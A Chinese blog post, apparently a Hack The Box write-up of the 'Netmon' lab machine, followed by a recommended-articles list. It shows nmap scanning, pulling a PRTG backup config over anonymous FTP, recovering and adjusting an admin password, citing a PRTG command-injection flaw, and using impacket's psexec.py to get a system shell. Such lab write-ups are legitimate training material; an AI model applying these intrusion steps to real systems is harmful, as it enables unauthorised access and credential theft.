Netmon

最新推荐文章于 2023-09-11 10:26:52 发布
最新推荐文章于 2023-09-11 10:26:52 发布
阅读量413 收藏
点赞数
分类专栏: HTB 文章标签: PRTG
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/124808262
版权

Netmon

这是第一次做Tracks的机器,可以说全程是跟着writeup做的。好菜🥦啊

先是nmap扫一下

sudo nmap -sC -sS -sV [ip-address]

在这里插入图片描述

发现ftp服务,而且允许匿名登录;还发现了Paessler PRTG bandwidth monitor 软件,这是一款流量监控软件。我们可以寻找其配置文件,因为这很可能隐藏着敏感信息。根据How and where does PRTG store its data?得知其数据文件存储在%programdata%\Paessler\PRTG Network Monitor,进入该目录看一下。

在进入时,一开始ls并没有显示ProgramData目录,通过社区询问可能是因为隐藏文件的原因所以用dir -ah才把ProgramData目录显示出来。

发现除了PRTG Configuration.datPRTG Configuration.oldPRTG Graph Data Cache.dat外还有一个文档中没有提及的PRTG Configuration.old.bak很显然这是该计算机用户自己创建的文件,很有必要看一下

get Configuration.old.bak

发现了一组账号密码

<!-- User: prtgadmin -->
PrTg@dmin2018

进入[ip-address]登录密码错误,将密码改成PrTg@dmin2019后登录成功。看到这里的时候再次感叹网安有时候就是这么不讲道理啊😥

下面就是根据PRTG < 18.2.39 Command Injection Vulnerability里来做的了。

按照步骤触发后使用psexec连接。这个工具是Microsoft开发的PsExec v2.34,所以很显然这是在Windows上运行的,想要在Kali上运行需要这个👉psexec.py

首先我们需要下载impacket

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
chmod +x setup.py
sudo ./setup.py

使用该工具连接主机,拿到系统shell

─$ psexec.py htb:'abc123!'@10.10.10.152

然后在根目录查找完全找不到,一度以为我的命令错了😥

dir flag.* /p /s

突然想到进入Administrator目录看一下,发现一个叫root.txt的文件,type发现是找了好久的flag😡没想到居然改名了。

C:\Users\Administrator> cd Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of C:\Users\Administrator\Desktop

02/03/2019  12:35 AM    <DIR>          .
02/03/2019  12:35 AM    <DIR>          ..
05/15/2022  08:40 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,765,780,992 bytes free

C:\Users\Administrator\Desktop> type root.txt
小莫神和他的的
关注
专栏目录
使用netmon进行网络监控
lijw2009的专栏
05-26 3855
笔者从事网络维护工作已有十多年的时间。在十年前,可供选择的比较理想的网络管理工具并不多,而且都比较难获得。一方面,网络管理工程师在应用编程和软件管理方面的知识和技能比较欠缺;另一方面,当时的网络管理工具的易用性确是不如人意。因此,笔者一直都想自己做一个符合自己管理思路和习惯的网络管理工具。如今,这个工具已经初步成形,在这里向大家介绍,这个工具叫netmon。 一、接口监控     netm
Distinct(NetMon)很好用的网络抓包工具
01-29
非常经典的网络抓包工具distinct(NetMon),可以设置任意过滤规则,界面易于操作。
netmon
发芽的石头
12-24 881
http://sourceforge.net/projects/almalert/先编译hwtrick,然后再编译netmon。如果有头文件找不到,可以在hwtrick下看看。 
netmon工作原理
weixin_34106122的博客
08-23 225
参考文献: netmon中解析非1433端口的TDS协议 TDS的解析 在前面一篇博客netmon中解析非1433端口的TDS协议中我们提到了netmon如何去解析非1433端口的TDS。我们是通过在tcp.npl这个文件中添加命名实例的tcp端口号,让该端口的tcp包跳转到tds.npl中去解析。下面我们来看一下tds.npl中有哪些内容呢?首先我看到在tds.npl中定义了一个 TDSP...
netmon:TCP 连接和电子邮件循环监控软件-开源
06-28
netmon 提供了一个简约的 Web 服务器来在浏览器中呈现此页面。 根据 NAGIOS 标准,检查也可以是外部程序。 它可以在检查失败时发出警报。 与 SSL/TLS 兼容。 1.1 版可以作为服务 (Windows) 或守护程序 (Linux) 运行...
netmon_cli:一个简单轻量级的终端数据包嗅探器
05-31
netmon_cli 一个用 C 编写的简单、轻量级的终端数据包嗅探器。 免责声明 此工具仅为教育目的而构建,对于因非法使用此脚本而造成的任何损坏,我概不负责。 关于 就像标题所说的那样,这是仅使用内置的libs用C语言...
Netmon-crx插件
04-02
语言:English (United States) ... ... 您可以随时使用它,也可以* and *... - 它是开源:https://github.com/kpion/netmon 如果您有任何建议,请不要犹豫,以konradpapala@gmail.com或文件在上面的github页面上提出问题。
Netmon 抓包经典排错案例 英文
10-23
【网络监控器(Netmon)抓包排错案例】 网络监控器(Netmon)是微软提供的一款强大的网络诊断工具,它允许用户捕获并分析网络流量,以解决各种网络问题。在本文中,我们将深入探讨几个使用Netmon进行排错的经典案例...
站点监控【网络监控NetMon
11-30
使用delphi开发的在线监测网络设备是否在线软件 功能1:调整设置设备结构,允许设置监控级别 功能2:自动定时检测设备是否在线 功能3:支持对不在线设备进行报警,对设备恢复链接也会通知 功能4:支持声音报警、邮件报警,短信报警待更新【建议发送到中国移动邮箱,打开该邮箱的短信报警功能】 功能5:站点信息云存储,云下载,在线更新软件版本【暂限于开发者内网】 制作人:eledway,eledway@163.com,30195789
Microsoft Network Monitor(网络实时监控) 3.4汉化绿色免费版
07-12
监控本地网络传输封包数据 需要先安装里面的3.1版再使用3.4版 汉化得比较完整的版本
Packet Tracer 使用教程(含pkt下载地址)
10-31
Packet Tracer 使用教程,含多个实验的pkt下载地址,是初学者进阶中级的首选。
金山卫士开源软件之旅(八) netmonnetmon工程的解析---netmon.exe的启动过程分析
andylau00j的专栏
01-21 1130
转载 引用于 http://blog.csdn.net/chenyujing1234   _tWInMain主要做安装,实例判断,初始化COM环境,开始界面显示. [cpp] view plaincopy int WINAPI _tWinMain(HINSTANCE hInstance, HINSTANCE /*hPrevInstance*/
金山卫士开源软件之旅(四) netmon下FwProxy工程的解析---接口实现及接口使用方法
chenyujing1234的专栏
04-17 2193
转载请标明是引用于 http://blog.csdn.net/chenyujing1234 上一篇文章金山卫士开源软件之旅(三) netmon下FwProxy工程的解析----COM组件的管理模式>>中讲到如何去实现CFwProxy::GetCLSID与CFwProxy::CreateInstance. 这里做继续介绍. FwProxy主要是防火墙的设计及驱动的加安装卸载。这里涉及两个类CF
Nmap命令扫描详解
热门推荐
chengxuyuanyonghu的专栏
02-14 2万+
在网络技术中,端口(Port)包括逻辑端口和物理端口两种类型。物理端口指的是物理存在的端口,如ADSL Modem、集线器、交换机、路由器上用 于连接其他网络设备的接口,如RJ-45端口、SC端口等等。逻辑端口是指逻辑意义上用于区分服务的端口,如TCP/IP协议中的服务端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等。由于物理端口和逻辑端口数量较多,为
【HTB系列】靶机Netmon的渗透测试
大方子
07-11 1711
总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2. 对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为 base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4. 通过命令行把终端内容保存到剪切板中 5. 运维人员密码修改的规律,仅仅修改了密码中的年份,这是设置新密码常用的思路 K...
SQL Server的Windows验证之NTLM的Netmon主要过程
m0_37783096的博客
09-24 457
NTLM连接SQL Server默认实例 1. 使用命令,ipconfig /flushdns, 然后再次去执行连接,由于没有client会发一个包给DNS Server, 来查询SERVER的IP地址。 2.然后,在服务器端,抓到的TCP三次握手过程。 3.三次握手建立以后,SQLNCLI10会发一个PreLogin的包,到SQL Server服务器上。 在PRELOGIN成功之后,也就...
网络抓包工具 - Network Monitor使用方法
繁星流动天际
03-23 1万+
下载地址 http://www.microsoft.com/en-us/download/details.aspx?id=4865 主要用途 抓取和解析各种协议的网络包 过滤网络报文 解析ETW Trace (etl格式文件) 使用方法 抓包 通过管理员权限打开,在Select Networks中选择需要监测的网卡(通常情况下默认选项即可) 选择New Capture新建抓包 选择Start按钮...
Windows系统管理三:用户管理与组管理
最新发布
weixin_62715196的博客
09-11 177
记录自己对用户管理和组管理的了解
用Linux创建一个脚本用于查看网卡实时流量
05-26
将上述脚本保存为一个文件,例如 `netmon.sh`,然后将其赋予执行权限: ``` chmod +x netmon.sh ``` 运行脚本时,指定要监视的网卡名称作为参数。例如,要监视 `eth0` 网卡的流量: ``` ./netmon.sh eth0 ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值